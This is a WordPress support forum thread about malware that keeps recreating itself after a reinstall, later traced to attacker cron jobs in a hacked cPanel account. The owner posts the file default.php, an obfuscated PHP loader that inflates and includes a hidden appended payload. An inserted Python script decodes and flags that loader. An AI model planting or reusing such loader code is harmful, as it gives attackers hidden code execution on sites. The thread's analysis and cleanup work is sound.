• I have an issue with a WordPress website facing a malware attack. I have tried clearing and removing the site malware in several ways, but this one seems so compromised that I had to back up and delete the whole site files and database, then reinstall a fresh copy of WordPress into that site. I left it for like 5 mins and AGAIN!!! the malware files were created in this freshly installed site. Could you please tell me what is going on with this site and where else this could be coming from? I'm just confused already. Haven't faced such an issue before.

    • This topic was modified 1 year, 4 months ago by spottykay.


Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @spottykay, sorry to hear you’re being affected like this.

    It’s possible that if the reinstall of WordPress uses a new admin account/password and new database name with a different prefix/user/password, another attack vector could be possible. Insecure/exposed hosting, cPanel or database admin accounts could be possibilities, but I can only speculate.

    As a rule, any time I think someone's site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this.

    I will provide our site cleaning instructions for you below even though you’ve already gone some way to dealing with this, just in case any steps you haven’t tried can help: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    XML-RPC requests are one of the most common brute force/credential stuffing attack methods so we always recommend using long unique passwords along with 2FA for your administrative accounts.

    Additionally, you might find the WordPress Malware Removal section in our free Learning Center helpful.

    If you are unable to fully clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,
    Peter.

    Thread Starter spottykay

    (@spottykay)

    Thanks Peter,
    Here's the code from a file that always recreates once the malware kickstarts operation in the file.

    <?php $s = "he" . "x2bin";$_ = array($s,"666f70656e","667365656b","746d7066696c65","73747265616d5f6765745f6d6574615f64617461",
    "667772697465","73747265616d5f6765745f636f6e74656e7473","66636c6f7365","5f5f68616c745f636f6d70696c6572","677a696e666c617465");
    $x1=$_[0];$x2=$x1($_[1]);$x3=$x1($_[2]);$x4=$x1($_[3]);$x5=$x1($_[4]);$x6=$x1($_[5]);$x7=$x1($_[6]);$x8=$x1($_[7]);$x9=$x1($_[8]);
    $x10=$x1($_[9]);$f=$x2(__FILE__,"r");$x3($f,__COMPILER_HALT_OFFSET__);$t=$x4();$u=$x5($t);$u=$u["uri"];$x6($t,$x10($x7($f)));
    IncLude($u);$x8($t);__Halt_CompiLer/** */();??/?(??J+?K.???S(N-*K-??T????TIQ?UP?w????t?
    h

    The file name is default.php. I'm sending it in case you have any idea about where it comes from or what kind it is. Wordfence gives me a report about something like x2bin….
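The dropper above hides the functions it calls as hex strings and rebuilds `hex2bin` from two fragments, so a plain grep for `gzinflate` or `include` finds nothing. The following triage script is an added example, not code from the thread or from Wordfence: it decodes the hex literals, rejoins split names, and flags the loader pattern (decoded `gzinflate`/`tmpfile` plus a `__halt_compiler` tail and an `include` of a variable). The embedded sample is a constructed, shortened copy of the posted file with its compressed payload omitted.

```python
import re
import binascii

# Constructed sample modelled on the posted default.php; the binary payload
# that follows __halt_compiler() in the real file is left out.
SAMPLE = r'''<?php $s = "he" . "x2bin";$_ = array($s,"666f70656e","667365656b","746d7066696c65",
"73747265616d5f6765745f6d6574615f64617461","667772697465","73747265616d5f6765745f636f6e74656e7473",
"66636c6f7365","5f5f68616c745f636f6d70696c6572","677a696e666c617465");
$x1=$_[0];$f=$x2(__FILE__,"r");IncLude($u);__Halt_CompiLer/** */();'''

# Decoded names that, taken together, indicate a self-extracting loader.
SUSPICIOUS = {"gzinflate", "gzuncompress", "base64_decode", "str_rot13",
              "__halt_compiler", "tmpfile", "stream_get_meta_data", "fwrite"}

HEX_LITERAL = re.compile(r'"((?:[0-9a-fA-F]{2}){3,})"')          # "666f70656e"
SPLIT_NAME = re.compile(r'"([A-Za-z_]+)"\s*\.\s*"([A-Za-z0-9_]+)"')  # "he" . "x2bin"

def decode_hex_strings(src: str) -> list[str]:
    """Decode every quoted hex literal in src; skip anything that is not valid text."""
    out = []
    for hx in HEX_LITERAL.findall(src):
        try:
            out.append(binascii.unhexlify(hx).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out

def find_split_names(src: str) -> list[str]:
    """Rejoin names hidden by string concatenation, e.g. "he" . "x2bin" -> hex2bin."""
    return [a + b for a, b in SPLIT_NAME.findall(src)]

def triage(src: str) -> dict:
    """Report decoded names and a verdict: 'loader', 'review' or 'clean'."""
    decoded = decode_hex_strings(src)
    joined = find_split_names(src)
    hits = sorted(set(decoded + joined) & SUSPICIOUS)
    # A __halt_compiler() call means data may be appended after the PHP code.
    halt = re.search(r"__halt_compiler", src, re.IGNORECASE) is not None
    # include() of a variable path is how the inflated tmpfile gets executed.
    includes_var = re.search(r"\binclude\s*\(\s*\$", src, re.IGNORECASE) is not None
    verdict = "loader" if (hits and halt and includes_var) else ("review" if hits else "clean")
    return {"decoded": decoded, "joined": joined, "hits": hits,
            "halt_compiler": halt, "include_variable": includes_var, "verdict": verdict}

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it over suspect files under wp-content or the web root; decoded names such as `fopen`, `fseek`, `gzinflate` and `__halt_compiler` appearing together in one short file are the signature to look for, whatever the file is called.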

    Thread Starter spottykay

    (@spottykay)

    I've found the solution. The hosting account was compromised and the hacker created cron jobs. I deleted them from cPanel and changed the cPanel account password.

    Hope this helps anyone facing the same issue.

  • The topic ‘Malware recreates itself even after deleting and reinstalling wordpress’ is closed to new replies.